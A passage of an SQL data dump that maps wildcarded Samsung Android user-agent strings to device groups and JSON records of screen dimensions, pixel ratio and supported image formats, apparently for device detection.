AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G903F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G903M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G903W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G920A) AppleWebKit (KHTML, like Gecko) Chrome Mobile Safari (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G920I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G920P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G920T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G920V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G9250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G925F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G925I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G925T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G925V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G928C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G928F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G928G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G928I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G928V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J100VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J105B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J105H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J105Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J110M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J111F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J111M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J120F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J120F) AppleWebKit/* (KHTML, like Gecko) Chrome (alpha) Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J120F) AppleWebKit/* (KHTML, like Gecko) Chrome (beta) Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J120F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J120FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J120G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J120H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J120M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J120ZN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J200BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J200F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J200G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J200GU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J200H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J200M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J200Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J3110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J3119) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J3119S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J320F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J320F) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J320F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J320FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J320G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J320H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J320M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J320P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J320YZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J320ZN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J5007) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J500FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J500G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J500N0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J5108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J510F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J7008) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J700H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J700K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J700M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-J7108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N7505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N750K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N750L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N750S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N9000Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N9002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N9005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 